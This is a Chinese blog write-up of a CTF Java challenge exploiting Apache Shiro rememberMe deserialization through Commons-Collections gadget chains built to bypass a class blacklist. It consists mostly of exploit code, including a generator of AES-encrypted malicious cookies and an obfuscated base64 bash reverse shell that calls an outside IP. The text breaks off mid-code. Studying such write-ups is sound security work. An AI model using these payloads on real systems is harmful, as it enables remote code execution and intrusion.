

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/default.png">
  <link rel="icon" href="/img/default.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="KKfine&#39;s blog">
  <meta name="keywords" content="">
  
  <title>车联网java题 - KKfine&#39;s blog</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10.7.2/styles/atelier-estuary-light.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.8.11","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null}},"search_path":"/local-search.xml"};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.4.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>KKfine's blog</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/7.jpg') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="车联网java题">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2022-03-15 12:46" pubdate>
        2022年3月15日 下午
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      2.9k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      44
       分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">车联网java题</h1>
            
            <div class="markdown-body">
              <p>这是一道shrio框架下反序列化的java题目，当时没打这个比赛，赛后来自己做下这个题目。个人感觉这道题很好的考察了关于CC链配合java8高版本的各种灵活运用。并且如果在初步调试了各个cc链之后，再来看这道题，能让本java废物对于CC的各个经典链子有更加熟悉的理解了。</p>
<p>附一张cc依赖各种链子的调用图</p>
<p><img src="https://img-blog.csdnimg.cn/e58fe2773c7b4808bc2f50d1d6e8f5d3.jpeg" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<h1 id="ezcc"><a href="#ezcc" class="headerlink" title="ezcc"></a>ezcc</h1><p>一些参考文章</p>
<h2 id="关于shrio的些东西"><a href="#关于shrio的些东西" class="headerlink" title="关于shrio的些东西"></a>关于shrio的些东西</h2><p>原理分析：根据shiro分析可以得到，主要存在几个重要的点:</p>
<blockquote>
<p>rememberMe cookie</p>
<p>CookieRememberMeManager.java</p>
<p>Base64</p>
<p>AES</p>
<p>加密密钥硬编码</p>
<p>Java serialization</p>
</blockquote>
<p>1.首先正常登录，然后生成带有rememberme的返回cookie值。</p>
<p>2.生成cookie，shiro会提供rememberme功能，可以通过cookie记录登录用户，从而记录登录用户的身份认证信息，即下次无需登录即可访问。处理rememberme的cookie的类为org.apache.shiro.web.mgt.CookieRememberMeManager</p>
<p>3.之后进入serialize，对登录认证信息进行序列化</p>
<p>4.然后加密，调用aes算法。</p>
<p>5.加密结束，然后在在org/apache/shiro/web/mgt/CookieRememberMeManager.java的rememberSerializedIdentity方法中进行base64编码，并通过response返回</p>
<p>6.解析cookie</p>
<p>7.先解密在反序列化</p>
<p>8.AES是对称加密，加解密密钥都是相同的，并且shiro都是将密钥硬编码</p>
<p>9.调用crypt方法利用密文，key，iv进行解密,解密完成后进入反序列化，看上面的public AbstractRememberMeManager()这里用的是默认反序列化类,然后触发生成反序列化。</p>
<h2 id="题解分析"><a href="#题解分析" class="headerlink" title="题解分析"></a>题解分析</h2><p>禁用的类</p>
<figure class="highlight"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs java">&lt;blacklist&gt;<br>  &lt;regexp&gt;^org\.apache\.commons\.collections\.functors\.InvokerTransformer$&lt;/regexp&gt;<br>  &lt;regexp&gt;^org\.apache\.commons\.beanutils\.BeanComparator$&lt;/regexp&gt;<br>  &lt;regexp&gt;^org\.apache\.commons\.collections\.functors\.ConstantTransformer$&lt;/regexp&gt;<br>  &lt;regexp&gt;^java\.rmi\.server\.RemoteObjectInvocationHandler$&lt;/regexp&gt;<br>&lt;/blacklist&gt;<br></code></pre></div></td></tr></table></figure>

<p>首先shrio框架可以在<code>org.apache.shiro.mgt.AbstractRememberMeManager</code>类中找到密钥<code>kPH+bIxk5D2deZiIxcaaaA==</code>。然后这题很明显就是寻找反序列化链子，查看依赖发现可利用的有<code>commons-collections3</code>和<code>commons-beanutils</code>，但是在<code>sk</code>里面ban了<code>InvokerTransformer$</code>,<code>ConstantTransformer$</code>,<code>BeanComparator$</code>,这些类，所以需要找到可以替换的类。</p>
<p>关于<code>InvokerTransformer</code>，可以替换成<code>InstantiateTransformer</code></p>
<p><img src="https://img-blog.csdnimg.cn/790c12c4d37e4b3b9f487d4a0dc117bc.png" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<p>然后我们注意到题目是tomcat服务，那么就存在<code>TemplatesImpl </code>这个利用点，然后还需要一个链来触发<code>TemplatesImpl </code>的<code>newTransformer</code>函数。所以如何触发<code>newTransformer</code>函数就成了关键。而熟悉的话就能想到<code>TrAXFilter</code>这个经常和<code>TemplatesImpl </code>出现在一起的类。</p>
<p><img src="C:\Users\86130\AppData\Roaming\Typora\typora-user-images\image-20220524193059221.png" srcset="/img/loading.gif" lazyload alt="image-20220524193059221"></p>
<h2 id="思路一（拼接BadAttributeValueExpException）"><a href="#思路一（拼接BadAttributeValueExpException）" class="headerlink" title="思路一（拼接BadAttributeValueExpException）"></a>思路一（拼接BadAttributeValueExpException）</h2><p>因为我对这个类很熟悉所以第一时间想到的只有这个类了。然后可以拼接<code>JDK1.8--LazyMap利用链</code>。通常的一个JDK1.8–LazyMap利用链如下</p>
<figure class="highlight java"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs java">反序列化BadAttributeValueExpException<br>-&gt;BadAttributeValueExpException.readObject()<br>-&gt;TiedMapEntry.toString()<br>-&gt;TiedMapEntry.getValue()<br>-&gt;LazyMap.get()<br>-&gt;ChainedTransformer.transform()<br></code></pre></div></td></tr></table></figure>

<p>我们将</p>
<figure class="highlight reasonml"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs reasonml">-&gt;<span class="hljs-module-access"><span class="hljs-module"><span class="hljs-identifier">ChainedTransformer</span>.</span></span>transform<span class="hljs-literal">()</span><br>这里替换成<br>-&gt;<span class="hljs-module-access"><span class="hljs-module"><span class="hljs-identifier">InstantiateTransformer</span>.</span></span>transform<span class="hljs-literal">()</span><br>-&gt;TrAXFilter.<span class="hljs-constructor">TrAXFilter()</span><br>-&gt;<span class="hljs-module-access"><span class="hljs-module"><span class="hljs-identifier">TemplatesImpl</span>.</span></span><span class="hljs-keyword">new</span><span class="hljs-constructor">Instance()</span><br>即可<br></code></pre></div></td></tr></table></figure>

<p>最终的调用栈就是</p>
<figure class="highlight livescript"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs livescript">-&gt;BadAttributeValueExpException.readObject()<br>-&gt;TiedMapEntry.toString()<br>-&gt;TiedMapEntry.getValue()<br>-&gt;LazyMap.get()<br>-&gt;InstantiateTransformer.transform()<br>-&gt;TrAXFilter.TrAXFilter()<br>-&gt;TemplatesImpl.newInstance()<br></code></pre></div></td></tr></table></figure>

<p>编写exp</p>
<figure class="highlight java"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs java"><span class="hljs-keyword">public</span> <span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">test2</span> </span>&#123;<br>    <span class="hljs-function"><span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title">main</span><span class="hljs-params">(String[] args)</span> <span class="hljs-keyword">throws</span> Exception </span>&#123;<br>        System.setProperty(<span class="hljs-string">&quot;org.apache.commons.collections.enableUnsafeSerialization&quot;</span>,<span class="hljs-string">&quot;true&quot;</span>);<br>        <span class="hljs-comment">//生成恶意代码</span><br>        ClassPool classPool = ClassPool.getDefault();<br>        CtClass ctClass =  classPool.makeClass(<span class="hljs-string">&quot;payload&quot;</span>);<br>        CtClass superClass = classPool.get(<span class="hljs-string">&quot;com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet&quot;</span>);<br>        ctClass.setSuperclass(superClass);<br>        CtConstructor constructor = ctClass.makeClassInitializer();<br>        constructor.setBody(<span class="hljs-string">&quot;Runtime.getRuntime().exec(\&quot;calc\&quot;);&quot;</span>);<br>        <span class="hljs-keyword">byte</span>[] bytes = ctClass.toBytecode();<br>        ctClass.writeFile();<br><br>        <span class="hljs-comment">//生成templatesImpl类</span><br>        TemplatesImpl templatesImpl = <span class="hljs-keyword">new</span> TemplatesImpl();<br>        setFieldValue(templatesImpl, <span class="hljs-string">&quot;_bytecodes&quot;</span>, <span class="hljs-keyword">new</span> <span class="hljs-keyword">byte</span>[][]&#123;bytes&#125;);<br>        setFieldValue(templatesImpl, <span class="hljs-string">&quot;_name&quot;</span>, <span class="hljs-string">&quot;a&quot;</span>);<br>        setFieldValue(templatesImpl, <span class="hljs-string">&quot;_tfactory&quot;</span>, <span class="hljs-keyword">null</span>);<br><br>        <span class="hljs-keyword">final</span> Map innerMap = <span class="hljs-keyword">new</span> HashMap();<br><br>        ConstantTransformer constantTransformer = <span class="hljs-keyword">new</span> ConstantTransformer(<span class="hljs-number">1</span>);<br><br>        InstantiateTransformer instantiateTransformer = <span class="hljs-keyword">new</span> InstantiateTransformer(<span class="hljs-keyword">new</span> Class[]&#123;Templates.class&#125;,<span class="hljs-keyword">new</span> Object[] &#123; templatesImpl &#125;);<br><br>        <span class="hljs-keyword">final</span> Map lazyMap = LazyMap.decorate(innerMap, constantTransformer);<br><br>        <span class="hljs-comment">//将map设置为LazyMap，key设为TrAXFilter.class为了后续可以调用TrAXFilter的初始化方法从而执行TemplatesImpl.transformer()函数</span><br>        TiedMapEntry tideMapEntry = <span class="hljs-keyword">new</span> TiedMapEntry(lazyMap, TrAXFilter.class);<br><br>        <span class="hljs-comment">//避免map.containsKey(key)为True，无法进入if循环，也就无法触发transform</span><br>        lazyMap.clear();<br><br>        Field field = LazyMap.class.getDeclaredField(<span class="hljs-string">&quot;factory&quot;</span>);<br>        field.setAccessible(<span class="hljs-keyword">true</span>);<br>        field.set(lazyMap,instantiateTransformer);<br><br>        BadAttributeValueExpException badAttributeValueExpException = <span class="hljs-keyword">new</span> BadAttributeValueExpException(<span class="hljs-keyword">null</span>);<br>        Field f = badAttributeValueExpException.getClass().getDeclaredField(<span class="hljs-string">&quot;val&quot;</span>);<br>        f.setAccessible(<span class="hljs-keyword">true</span>);<br>        f.set(badAttributeValueExpException,tideMapEntry);<br><br>        ByteArrayOutputStream barr = <span class="hljs-keyword">new</span> ByteArrayOutputStream();<br>        ObjectOutputStream oos = <span class="hljs-keyword">new</span> ObjectOutputStream(barr);<br>        oos.writeObject(badAttributeValueExpException);<br>        oos.close();<br><br><br>        ByteArrayInputStream in = <span class="hljs-keyword">new</span> ByteArrayInputStream(barr.toByteArray());<br>        ObjectInputStream objectInputStream = <span class="hljs-keyword">new</span> ObjectInputStream(in);<br>        objectInputStream.readObject();<br>        objectInputStream.close();<br><br>        <span class="hljs-keyword">byte</span>[] payloads = barr.toByteArray();<br>        AesCipherService aes = <span class="hljs-keyword">new</span> AesCipherService();<br>        <span class="hljs-keyword">byte</span>[] key = java.util.Base64.getDecoder().decode(<span class="hljs-string">&quot;7Bhs26ccN6i/0AT9GhZULF==&quot;</span>);<br>        ByteSource ciphertext = aes.encrypt(payloads, key);<br>        System.out.printf(ciphertext.toString());<br><br>    &#125;<br>    <span class="hljs-function"><span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span>  <span class="hljs-keyword">void</span> <span class="hljs-title">setFieldValue</span><span class="hljs-params">(Object obj,String key, Object value)</span> <span class="hljs-keyword">throws</span> NoSuchFieldException, IllegalAccessException </span>&#123;<br>        Field field = obj.getClass().getDeclaredField(key);<br>        field.setAccessible(<span class="hljs-keyword">true</span>);<br>        field.set(obj,value);<br>    &#125;<br>&#125;<br></code></pre></div></td></tr></table></figure>

<p><img src="C:\Users\86130\AppData\Roaming\Typora\typora-user-images\image-20220524123747069.png" srcset="/img/loading.gif" lazyload alt="image-20220524123747069"></p>
<h2 id="思路二-官方wp-拼接TiedMapEntry"><a href="#思路二-官方wp-拼接TiedMapEntry" class="headerlink" title="思路二(官方wp)拼接TiedMapEntry"></a>思路二(官方wp)拼接TiedMapEntry</h2><p>我是并没有想到用<code>TiedMapEntry</code>，虽然调试过，但可能就是浮于表面不熟悉，不太能灵活的运用。</p>
<p>JDK1.8–LazyMap利用链原本如下。其实就是为了解决Java高版本利用问题，需要在找上下文中是否还有其他调用<code>LazyMap#get()</code>的地方。</p>
<p>不同于上面的调用链的前半部分，这个链子是通过<code>TiedMapEntry</code>来调用<code>LazyMap#get()</code>。所以我们只需要更改后半部分的恶意代码执行类就行了。</p>
<figure class="highlight xquery"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs xquery">/*<br>	Gadget chain:<br>	    java.io.ObjectInputStream.readObject()<br>            java.util.HashMap.readObject()<br>                java.util.HashMap.hash()<br>                    org.apache.commons.collections.keyvalue.TiedMapEntry.hashCode()<br>                    org.apache.commons.collections.keyvalue.TiedMapEntry.getValue()<br>                        org.apache.commons.collections.<span class="hljs-keyword">map</span>.LazyMap.get()<br>                            org.apache.commons.collections.functors.ChainedTransformer<span class="hljs-built_in">.transform</span>()<br>                            org.apache.commons.collections.functors.InvokerTransformer<span class="hljs-built_in">.transform</span>()<br>                            java<span class="hljs-built_in">.lang</span>.reflect.Method.invoke()<br>                                java<span class="hljs-built_in">.lang</span>.Runtime.exec()<br>*/<br></code></pre></div></td></tr></table></figure>

<p>更改完的调用链，区别就在于前半部分</p>
<figure class="highlight stylus"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs stylus"><span class="hljs-function"><span class="hljs-title">readObject</span><span class="hljs-params">()</span></span><br>-&gt;java<span class="hljs-selector-class">.util</span><span class="hljs-selector-class">.HashMap</span><span class="hljs-selector-class">.put</span>()<br>-&gt;java<span class="hljs-selector-class">.util</span><span class="hljs-selector-class">.HashMap</span><span class="hljs-selector-class">.hash</span>()<br>-&gt;org<span class="hljs-selector-class">.apache</span><span class="hljs-selector-class">.commons</span><span class="hljs-selector-class">.collections</span><span class="hljs-selector-class">.keyvalue</span><span class="hljs-selector-class">.TiedMapEntry</span><span class="hljs-selector-class">.hashcode</span>()<br>-&gt;org<span class="hljs-selector-class">.apache</span><span class="hljs-selector-class">.commons</span><span class="hljs-selector-class">.collections</span><span class="hljs-selector-class">.keyvalue</span><span class="hljs-selector-class">.TiedMapEntry</span><span class="hljs-selector-class">.getValue</span>()<br>-&gt;org<span class="hljs-selector-class">.apache</span><span class="hljs-selector-class">.commons</span><span class="hljs-selector-class">.collections</span><span class="hljs-selector-class">.map</span><span class="hljs-selector-class">.LazyMap</span><span class="hljs-selector-class">.get</span>()<br>-&gt;org<span class="hljs-selector-class">.apache</span><span class="hljs-selector-class">.commons</span><span class="hljs-selector-class">.collections</span><span class="hljs-selector-class">.functors</span><span class="hljs-selector-class">.InstantiateTransformer</span><span class="hljs-selector-class">.transform</span>()<br>-&gt;com<span class="hljs-selector-class">.sun</span><span class="hljs-selector-class">.org</span><span class="hljs-selector-class">.apache</span><span class="hljs-selector-class">.xalan</span><span class="hljs-selector-class">.internal</span><span class="hljs-selector-class">.xsltc</span><span class="hljs-selector-class">.trax</span><span class="hljs-selector-class">.TrAXFilter</span><span class="hljs-selector-class">.TrAXFilter</span>()<br>-&gt;com<span class="hljs-selector-class">.sun</span><span class="hljs-selector-class">.org</span><span class="hljs-selector-class">.apache</span><span class="hljs-selector-class">.xalan</span><span class="hljs-selector-class">.internal</span><span class="hljs-selector-class">.xsltc</span><span class="hljs-selector-class">.trax</span><span class="hljs-selector-class">.TemplatesImpl</span><span class="hljs-selector-class">.newTransformer</span>()<br></code></pre></div></td></tr></table></figure>

<p>这里就不调试了，exp如下:</p>
<p>这里有个细节就是需要先设置一个无关紧要的transformer，最后再替换就行，防止expMap.put()操作发生报错。</p>
<figure class="highlight java"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs java"><span class="hljs-keyword">package</span> ezcc.exp;<br><br><span class="hljs-keyword">import</span> com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;<br><span class="hljs-keyword">import</span> javassist.*;<br><span class="hljs-keyword">import</span> org.apache.commons.collections.functors.ConstantTransformer;<br><span class="hljs-keyword">import</span> org.apache.commons.collections.functors.InstantiateTransformer;<br><span class="hljs-keyword">import</span> com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;<br><br><span class="hljs-keyword">import</span> java.io.*;<br><span class="hljs-keyword">import</span> java.lang.reflect.Field;<br><span class="hljs-keyword">import</span> java.util.Base64;<br><span class="hljs-keyword">import</span> java.util.HashMap;<br><span class="hljs-keyword">import</span> java.util.Map;<br><span class="hljs-keyword">import</span> org.apache.commons.collections.keyvalue.TiedMapEntry;<br><span class="hljs-keyword">import</span> org.apache.commons.collections.map.LazyMap;<br><span class="hljs-keyword">import</span> org.apache.shiro.crypto.AesCipherService;<br><span class="hljs-keyword">import</span> org.apache.shiro.util.ByteSource;<br><span class="hljs-keyword">import</span> javax.xml.transform.Templates;<br><br><span class="hljs-keyword">public</span> <span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">test</span> </span>&#123;<br>    <span class="hljs-function"><span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title">main</span><span class="hljs-params">(String[] args)</span> <span class="hljs-keyword">throws</span> Exception </span>&#123;<br>        System.setProperty(<span class="hljs-string">&quot;org.apache.commons.collections.enableUnsafeSerialization&quot;</span>,<span class="hljs-string">&quot;true&quot;</span>);<br>        <span class="hljs-comment">//生成恶意代码</span><br>        ClassPool classPool = ClassPool.getDefault();<br>        CtClass ctClass =  classPool.makeClass(<span class="hljs-string">&quot;payload&quot;</span>);<br>        CtClass superClass = classPool.get(<span class="hljs-string">&quot;com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet&quot;</span>);<br>        ctClass.setSuperclass(superClass);<br>        CtConstructor constructor = ctClass.makeClassInitializer();<br>        constructor.setBody(<span class="hljs-string">&quot;Runtime.getRuntime().exec(\&quot;bash -c &#123;echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8zOS4xMDcuMjM5LjMwLzIzMzMgMD4mMQ==&#125;|&#123;base64,-d&#125;|&#123;bash,-i&#125;\&quot;);&quot;</span>);<br>        <span class="hljs-keyword">byte</span>[] bytes = ctClass.toBytecode();<br>        ctClass.writeFile();<br><br>        <span class="hljs-comment">//生成templatesImpl类</span><br>        TemplatesImpl templatesImpl = <span class="hljs-keyword">new</span> TemplatesImpl();<br>        setFieldValue(templatesImpl, <span class="hljs-string">&quot;_bytecodes&quot;</span>, <span class="hljs-keyword">new</span> <span class="hljs-keyword">byte</span>[][]&#123;bytes&#125;);<br>        setFieldValue(templatesImpl, <span class="hljs-string">&quot;_name&quot;</span>, <span class="hljs-string">&quot;a&quot;</span>);<br>        setFieldValue(templatesImpl, <span class="hljs-string">&quot;_tfactory&quot;</span>, <span class="hljs-keyword">null</span>);<br><br>        <span class="hljs-keyword">final</span> Map innerMap = <span class="hljs-keyword">new</span> HashMap();<br><br>        <span class="hljs-comment">//防止expMap.put()操作发生报错，需要先用一个无关紧要的Transformer类</span><br>        ConstantTransformer constantTransformer = <span class="hljs-keyword">new</span> ConstantTransformer(<span class="hljs-number">1</span>);<br><br>        InstantiateTransformer instantiateTransformer = <span class="hljs-keyword">new</span> InstantiateTransformer(<span class="hljs-keyword">new</span> Class[]&#123;Templates.class&#125;,<span class="hljs-keyword">new</span> Object[] &#123; templatesImpl &#125;);<br><br>        <span class="hljs-keyword">final</span> Map lazyMap = LazyMap.decorate(innerMap, constantTransformer);<br><br>        <span class="hljs-comment">//将map设置为LazyMap，key设为TrAXFilter.class为了后续可以调用TrAXFilter的初始化方法从而执行TemplatesImpl.transformer()函数</span><br>        TiedMapEntry tideMapEntry = <span class="hljs-keyword">new</span> TiedMapEntry(lazyMap,TrAXFilter.class);<br><br>        <span class="hljs-keyword">final</span> HashMap expMap = <span class="hljs-keyword">new</span> HashMap();<br>        expMap.put(tideMapEntry,<span class="hljs-string">&quot;kkfine&quot;</span>);<br><br>        <span class="hljs-comment">//避免map.containsKey(key)为True，无法进入if循环，也就无法触发transform</span><br>        lazyMap.clear();<br><br>        Field field = LazyMap.class.getDeclaredField(<span class="hljs-string">&quot;factory&quot;</span>);<br>        field.setAccessible(<span class="hljs-keyword">true</span>);<br>        